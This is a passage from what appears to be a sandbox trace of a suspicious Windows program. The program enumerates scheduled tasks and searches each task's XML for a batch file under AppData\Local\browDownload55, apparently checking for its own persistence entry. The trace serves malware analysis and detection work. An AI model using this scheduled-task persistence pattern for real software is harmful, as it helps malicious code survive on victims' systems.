index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x33, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.802] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.805] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.805] IUnknown:Release (This=0x929590) returned 0x0 [0163.805] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.808] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.808] IUnknown:Release (This=0x929590) returned 0x0 [0163.808] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.808] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.808] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.812] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.812] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.812] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="StartComponentCleanup") returned 0x0 [0163.812] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\Servicing\\StartComponentCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {752073A1-23F2-4396-85F0-8FDB879ED0ED}\r\n \r\n \r\n") returned 0x0 [0163.814] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Servicing\\StartComponentCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {752073A1-23F2-4396-85F0-8FDB879ED0ED}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.814] IUnknown:Release (This=0x929710) returned 0x0 [0163.814] IUnknown:Release (This=0x929590) returned 0x0 [0163.814] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.817] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.817] IUnknown:Release (This=0x929590) returned 0x0 [0163.817] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.817] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.817] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.821] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.821] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.821] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="BackgroundUploadTask") returned 0x0 [0163.821] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\BackgroundUploadTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n PT3H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {59B9640B-3F70-4D1C-B159-F26EEB8A4C87}\r\n \r\n \r\n") returned 0x0 [0163.823] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\BackgroundUploadTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n Parallel\r\n true\r\n true\r\n \r\n PT3H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {59B9640B-3F70-4D1C-B159-F26EEB8A4C87}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.823] IUnknown:Release (This=0x929710) returned 0x0 [0163.823] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.823] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="NetworkStateChangeTask") returned 0x0 [0163.823] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\NetworkStateChangeTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Queue\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0B8441\r\n 03\r\n \r\n \r\n 7510BCA33E0B8441\r\n 03\r\n \r\n \r\n \r\n \r\n {A4173A49-F373-4475-9A0F-2D615204DC20}\r\n \r\n \r\n") returned 0x0 [0163.825] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FRFX;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)\r\n \\Microsoft\\Windows\\SettingSync\\NetworkStateChangeTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Queue\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0B8441\r\n 03\r\n \r\n \r\n 7510BCA33E0B8441\r\n 03\r\n \r\n \r\n \r\n \r\n {A4173A49-F373-4475-9A0F-2D615204DC20}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.825] IUnknown:Release (This=0x929710) returned 0x0 [0163.825] IUnknown:Release (This=0x929590) returned 0x0 [0163.825] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.834] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.834] IUnknown:Release (This=0x929590) returned 0x0 [0163.834] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.834] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.834] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.839] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.839] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.839] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="CreateObjectTask") returned 0x0 [0163.839] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14350)\r\n \\Microsoft\\Windows\\Shell\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {990A9F8F-301F-45F7-8D0E-68C5952DBA43}\r\n \r\n \r\n") returned 0x0 [0163.841] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14350)\r\n \\Microsoft\\Windows\\Shell\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {990A9F8F-301F-45F7-8D0E-68C5952DBA43}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.841] IUnknown:Release (This=0x929700) returned 0x0 [0163.841] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.841] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="FamilySafetyMonitor") returned 0x0 [0163.841] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32013)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32014)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32015)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyMonitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n PT10M\r\n Queue\r\n 1\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\wpcmon.exe\r\n \r\n \r\n") returned 0x0 [0163.843] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32013)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32014)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32015)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyMonitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n PT10M\r\n Queue\r\n 1\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\wpcmon.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.843] IUnknown:Release (This=0x929700) returned 0x0 [0163.843] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.843] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="FamilySafetyRefresh") returned 0x0 [0163.843] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32010)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32011)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32012)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyRefresh\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A089541\r\n \r\n \r\n \r\n \r\n {EBF00FCB-0769-4B81-9BEC-6C05514111AA}\r\n \r\n \r\n \r\n") returned 0x0 [0163.844] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32010)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32011)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32012)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyRefresh\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A089541\r\n \r\n \r\n \r\n \r\n {EBF00FCB-0769-4B81-9BEC-6C05514111AA}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.845] IUnknown:Release (This=0x929700) returned 0x0 [0163.845] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.845] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="IndexerAutomaticMaintenance") returned 0x0 [0163.845] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BA)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1902)\r\n \\Microsoft\\Windows\\Shell\\IndexerAutomaticMaintenance\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6}\r\n \r\n \r\n") returned 0x0 [0163.846] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BA)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1902)\r\n \\Microsoft\\Windows\\Shell\\IndexerAutomaticMaintenance\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.846] IUnknown:Release (This=0x929700) returned 0x0 [0163.846] IUnknown:Release (This=0x929580) returned 0x0 [0163.846] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.849] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.849] IUnknown:Release (This=0x929580) returned 0x0 [0163.849] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.849] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.849] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.853] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0163.853] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.853] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="SvcRestartTask") returned 0x0 [0163.854] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2121-09-03T20:02:58+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0163.856] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2121-09-03T20:02:58+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.856] IUnknown:Release (This=0x929750) returned 0x0 [0163.857] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.857] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="SvcRestartTaskLogon") returned 0x0 [0163.857] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-202)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskLogon\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0163.859] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-202)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskLogon\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.859] IUnknown:Release (This=0x929750) returned 0x0 [0163.859] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.859] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="SvcRestartTaskNetwork") returned 0x0 [0163.859] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-431836887-2321537645-4075769387-3393595759-2187231311)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-203)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskNetwork\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-NetworkProfile/Operational\"><Select Path=\"Microsoft-Windows-NetworkProfile/Operational\">*[System[EventID=10000]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0163.863] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-431836887-2321537645-4075769387-3393595759-2187231311)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-203)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskNetwork\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-NetworkProfile/Operational\"><Select Path=\"Microsoft-Windows-NetworkProfile/Operational\">*[System[EventID=10000]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.863] IUnknown:Release (This=0x929750) returned 0x0 [0163.863] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.863] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.869] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.869] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.869] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.869] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x38, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.869] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.870] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.870] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.870] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="SpaceAgentTask") returned 0x0 [0163.870] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceAgentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7508BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceAgent.exe\r\n \r\n \r\n") returned 0x0 [0163.871] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceAgentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n 